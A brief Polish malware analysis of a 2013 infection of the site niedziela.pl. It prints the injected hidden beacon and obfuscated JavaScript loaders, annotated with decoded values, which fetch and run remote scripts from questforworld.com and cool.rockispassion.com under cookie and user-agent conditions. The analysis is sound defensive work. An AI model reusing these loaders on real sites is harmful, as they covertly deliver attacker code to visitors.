Szybka analiza infekcji niedziela.pl z 7 ‎listopada ‎2013

1. //@[http://niedziela.pl] HTML:
2.  
3. <img id="beacon_73ef615c52" width="0" height="0" alt="" style="width: 0px; height: 0px;" data-image="oV]F?zd&gt;^O0$5rL&quot;E,)3T&lt;:#}N%u&amp;/{HXUSWps+ixt@bm~qGh7AvCQ;1-Jc*kZIgl!fnyw9DP6Rj2e[(aYB8._=KM4">
4.  
5. //@[http://niedziela.pl] JS/body:
6.  
7. function cc(ccn) { //"niedziela.pl"
8.     var c = d['cookie']; //"isMobile=0; showMobile=0; PHPSESSID=87iQQgiUbpmcOOq4O6wq-3; OAID=71cde3f523de987faf5bb0717bd00213"
9.     return c.search(ccn.split('').reverse().join('')) < 0; //true
10. }
11.  
12. function ch() {
13.     var p = document.location.host; //"niedziela.pl"
14.     return p; //"niedziela.pl"
15. }
16.  
17. function fg() {
18.     return as([47, 27, 78, 37, 41, 67, 0, 13, 70, 0, 13, 65, 6, 85, 59, 0, 45, 29, 45, 78, 6, 39, 81, 29, 37, 59, 13, 39, 36, 41, 85, 76, 37]); //"questforworld.com/media/script.js"
19. }
20.  
21. var d = document; //dokument html
22. if (cc(ch())) { //true
23.     var ge = d.createElement('script'); //"<script></script>""
24.     ge.src = document.location.protocol + '//' + fg(); //"http://questforworld.com/media/script.js"
25.     d.head.appendChild(ge); //"<script src="http://questforworld.com/media/script.js"></script>""
26. } else {}
27.  
28. function as(l) { //[47, 27, 78, 37, 41, 67, 0, 13, 70, 0, 13, 65, 6, 85, 59, 0, 45, 29, 45, 78, 6, 39, 81, 29, 37, 59, 13, 39, 36, 41, 85, 76, 37]
29.     var g = g1().split(''), //["o", "V", "]", "F", "?", "z", "d", ">", "^", "O", "0", "$", "5", "r", "L", """, "E", ",", ")", "3", "T", "<", ":", "#", "}", "N", "%", "u", "&", "/", "{", "H", "X", "U", "S", "W", "p", "s", "+", "i", "x", "t", "`", "@", "b", "m", "~", "q", "G", "h", "7", "A", "v", "C", "Q", ";", "1", "-", "J", "c", "*", "k", "Z", "I", "g", "l", "!", "f", "n", "y", "w", "9", "D", "P", "6", "R", "j", "2", "e", "[", "(", "a", "Y", "B", "8", ".", "_", "=", "K", "M", "4"]
30.         t = new String(); //""
31.     for (var al in l) {
32.         t += g[l[al]];
33.     }
34.     return t; //"questforworld.com/media/script.js"
35. }
36.  
37. function g1() {
38.     return document.getElementById('beacon_73ef615c52').getAttribute('data-image'); //"oV]F?zd>^O0$5rL"E,)3T<:#}N%u&/{HXUSWps+ixt`@bm~qGh7AvCQ;1-Jc*kZIgl!fnyw9DP6Rj2e[(aYB8._=KM4"
39. }
40.  
41.  
42.  
43.  
44. //@[http://questforworld.com/media/script.js]:
45.  
46. var gi = window.g1 || gl; //"oV]F?zd>^O0$5rL"E,)3T<:#}N%u&/{HXUSWps+ixt`@bm~qGh7AvCQ;1-Jc*kZIgl!fnyw9DP6Rj2e[(aYB8._=KM4"
47.  
48. function ua() {
49.     return /safari|linux|mac|mini|android|nokia|mobile/.test(navigator.userAgent.toLowerCase()); //true #dla chrome
50. }
51.  
52. function cm(nm, ti) {
53.     document.cookie = nm + '=1;path=/;max-age=' + ti;
54. }
55.  
56. function cl() {
57.     var p = document.location.host; //"niedziela.pl"
58.     return p.split('').reverse().join(''); //"lp.aleizdein"
59. }
60.  
61. function cnr() {
62.     var p = document.location.host; //"niedziela.pl"
63.     return p.split(/^a-z0-9/).join(''); //"niedziela.pl"
64. }
65.  
66. function gl() {
67.     return '(MV>`O!BwnA,Xs]Py1c&=Q5Er^<uZ/"2oDmtpdxzajKq_IgJH@4UC?*L;e7vh[i0N.-b~FlST8}k:G)9{YRW$f%36+#';
68. }
69.  
70. function fh() {
71.     return az([59, 0, 0, 65, 85, 13, 0, 59, 61, 39, 37, 36, 81, 37, 37, 39, 0, 68, 85, 59, 0, 45, 29, 76, 37, 29, 37, 59, 13, 39, 36, 41, 85, 76, 37]); //"cool.rockispassion.com/js/script.js"
72.     //zmodyfikowany później na [70,17,70,70,6,51,15,65,76,18,8,62,85,17,62,62,8,65,9,51,76,65,57,0,86,62,0,62,76,15,8,85,47,51,86,62]
73. }
74.  
75. function az(tt) {
76.     var g = gi().split(''), //["o", "V", "]", "F", "?", "z", "d", ">", "^", "O", "0", "$", "5", "r", "L", """, "E", ",", ")", "3", "T", "<", ":", "#", "}", "N", "%", "u", "&", "/", "{", "H", "X", "U", "S", "W", "p", "s", "+", "i", "x", "t", "`", "@", "b", "m", "~", "q", "G", "h", "7", "A", "v", "C", "Q", ";", "1", "-", "J", "c", "*", "k", "Z", "I", "g", "l", "!", "f", "n", "y", "w", "9", "D", "P", "6", "R", "j", "2", "e", "[", "(", "a", "Y", "B", "8", ".", "_", "=", "K", "M", "4"]
77.         tl = new String(); //""
78.     for (var ab in tt) {
79.         tl += g[tt[ab]];
80.     }
81.     return tl; //"cool.rockispassion.com/js/script.js"
82. }
83.  
84. function cct() {
85.     return document.cookie.search(cnr()) > -1; //false
86. }
87. if (!cct()) { //true #drugie wywołanie strony: false
88.     cm(cnr(), 9999999); //"niedziela.pl=1;path=/;max-age=9999999"
89.     cm(cl(), 100); //"lp.aleizdein=1;path=/;max-age=100"
90. } else {
91.     if (!ua()) {
92.         var fm = d.createElement(az([37, 59, 13, 39, 36, 41])); //<script></script>
93.         //zmodyfikowany później na 62,76,15,8,85,47
94.         fm.async = 1; //<script async></script> #http://davidwalsh.name/html5-async
95.         fm.src = document.location.protocol + '//' + fh(); //<script async src="http://cool.rockispassion.com/js/script.js"></script>
96.         d.body.appendChild(fm);
97.         cm(cl(), 432000); //"lp.aleizdein=1;path=/;max-age=432000"
98.     } else {}
99. }
100.  
101. //@[http://cool.rockispassion.com/js/script.js]: ??